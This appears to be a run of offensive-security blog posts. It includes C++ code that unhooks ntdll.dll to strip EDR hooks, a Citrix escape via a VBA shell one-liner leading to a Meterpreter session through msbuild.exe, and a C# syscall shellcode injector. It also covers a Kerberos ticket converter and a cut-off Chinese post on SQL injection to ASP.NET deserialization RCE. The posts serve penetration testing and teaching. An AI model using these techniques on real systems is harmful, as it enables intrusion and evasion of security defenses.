Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what were are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the hookedSectionHeader->VirtualAddress address of the .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes )

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize)

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax and a number instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Escaping Citrix Workspace and Getting Shells

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to and RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel presented over the network onto our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

1
2
3
Sub X()
    Shell "CMD /K/ %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked the by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard or impossible to present VB and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

Using Syscalls to Inject Shellcode on Windows

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into. One is using native Windows system calls (AKA syscalls), or using Dynamic Invocation. Each have their pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly the changing the assembly of commonly abused API calls to jump to AV/EDR controlled code, where it is then inspected, and assuming the call is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files, in this case MSDN tells us in Kernel32.dll. These are user-mode DLLs, which mean they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. This API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernell32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason it exists is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system. So the way it is able to access lower-level functionality is through native PIs. But if the native APIs still have to call yet lower level APIs, why not got straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs with out affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easist way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re looking for (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern, in that some arguments are setup on the stack, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed on in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and start the thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we’re now able to execute our syscall! We can call assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We setup the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we start the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerebos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the type of file commonly used by Mimikatz. The Base64 encoding make it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the havy lifting.

從 SQL 到 RCE: 利用 SessionState 反序列化攻擊 ASP.NET 網站應用程式

20 April 2020 at 16:00

今日來聊聊在去年某次滲透測試過中發現的趣事,那是在一個風和日麗的下午,與往常一樣進行著枯燥的測試環節,對每個參數嘗試各種可能的注入,但遲遲沒有任何進展和突破,直到在某個頁面上注入 ?id=1; waitfor delay '00:00:05'--,然後他就卡住了,過了恰好 5 秒鐘後伺服器又有回應,這表示我們找到一個 SQL Server 上的 SQL Injection!

一些陳舊、龐大的系統中,因為一些複雜的因素,往往仍使用著 sa 帳戶來登入 SQL Server,而在有如此高權限的資料庫帳戶前提下,我們可以輕易利用 xp_cmdshell 來執行系統指令以取得資料庫伺服器的作業系統控制權,但假如故事有如此順利,就不會出現這篇文章,所以理所當然我們取得的資料庫帳戶並沒有足夠權限。但因為發現的 SQL Injection 是 Stacked based,我們仍然可以對資料表做 CRUD,運氣好控制到一些網站設定變數的話,甚至可以直接達成 RCE,所以還是試著 dump schema 以了解架構,而在 dump 過程中發現了一個有趣的資料庫:

Database: ASPState
[2 tables]
+---------------------------------------+
| dbo.ASPStateTempApplications          |
| dbo.ASPStateTempSessions              |
+---------------------------------------+

閱讀文件後了解到,這個資料庫的存在用途是用來保存 ASP.NET 網站應用程式的 session。一般情況下預設 session 是儲存在 ASP.NET 網站應用程式的記憶體中,但某些分散式架構(例如 Load Balance 架構)的情況下,同時會有多個一模一樣的 ASP.NET 網站應用程式運行在不同伺服器主機上,而使用者每次請求時被分配到的伺服器主機也不會完全一致,就會需要有可以讓多個主機共享 session 的機制,而儲存在 SQL Server 上就是一種解決方案之一,想啟用這個機制可以在 web.config 中添加如下設定:

<configuration>
    <system.web>
        <!-- 將 session 保存在 SQL Server 中。 -->
        <sessionState
            mode="SQLServer"
            sqlConnectionString="data source=127.0.0.1;user id=<username>;password=<password>"
            timeout="20"
        />
        
        <!-- 預設值,將 session 保存在記憶體中。 -->
        <!-- <sessionState mode="InProc" timeout="20" /> -->
 
        <!-- 將 session 保存在 ASP.NET State Service 中,
             另一種跨主機共享 session 的解決方案。 -->
        <!--
        <sessionState
            mode="StateServer"
            stateConnectionString="tcpip=localhost:42424"
            timeout="20"
        />
        -->
    </system.web>
</configuration>

而要在資料庫中建立 ASPState 的資料庫,可以利用內建的工具 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe 完成這個任務,只需要使用下述指令即可:

# 建立 ASPState 資料庫
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssadd -sstype p

# 移除 ASPState 資料庫
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssremove -sstype p

現在我們了解如何設定 session 的儲存位置,且又可以控制 ASPState 資料庫,可以做到些什麼呢?這就是文章標題的重點,取得 Remote Code Execution!

ASP.NET 允許我們在 session 中儲存一些物件,例如儲存一個 List 物件:Session["secret"] = new List<String>() { "secret string" };,對於如何將這些物件保存到 SQL Server 上,理所當然地使用了序列化機制來處理,而我們又控制了資料庫,所以也能執行任意反序列化,為此需要先了解 Session 物件序列化與反序列化的過程。

簡單閱讀程式碼後,很快就可以定位出處理相關過程的類別,為了縮減說明的篇幅,以下將直接切入重點說明從資料庫取出資料後進行了什麼樣的反序列化操作。核心主要是透過呼叫 SqlSessionStateStore.GetItem 函式還原出 Session 物件,雖然已盡可能把無關緊要的程式碼移除,但行數還是偏多,如果懶得閱讀程式碼的朋友可以直接下拉繼續看文章說明 XD

namespace System.Web.SessionState {
    internal class SqlSessionStateStore : SessionStateStoreProviderBase {
        public override SessionStateStoreData  GetItem(HttpContext context,
                                                        String id,
                                                        out bool locked,
                                                        out TimeSpan lockAge,
                                                        out object lockId,
                                                        out SessionStateActions actionFlags) {
            SessionIDManager.CheckIdLength(id, true /* throwOnFail */);
            return DoGet(context, id, false, out locked, out lockAge, out lockId, out actionFlags);
        }

        SessionStateStoreData DoGet(HttpContext context, String id, bool getExclusive,
                                        out bool locked,
                                        out TimeSpan lockAge,
                                        out object lockId,
                                        out SessionStateActions actionFlags) {
            SqlDataReader       reader;
            byte []             buf;
            MemoryStream        stream = null;
            SessionStateStoreData    item;
            SqlStateConnection  conn = null;
            SqlCommand          cmd = null;
            bool                usePooling = true;

            buf = null;
            reader = null;
            conn = GetConnection(id, ref usePooling);

            try {
                if (getExclusive) {
                    cmd = conn.TempGetExclusive;
                } else {
                    cmd = conn.TempGet;
                }

                cmd.Parameters[0].Value = id + _partitionInfo.AppSuffix; // @id
                cmd.Parameters[1].Value = Convert.DBNull;   // @itemShort
                cmd.Parameters[2].Value = Convert.DBNull;   // @locked
                cmd.Parameters[3].Value = Convert.DBNull;   // @lockDate or @lockAge
                cmd.Parameters[4].Value = Convert.DBNull;   // @lockCookie
                cmd.Parameters[5].Value = Convert.DBNull;   // @actionFlags

                using(reader = SqlExecuteReaderWithRetry(cmd, CommandBehavior.Default)) {
                    if (reader != null) {
                        try {
                            if (reader.Read()) {
                                buf = (byte[]) reader[0];
                            }
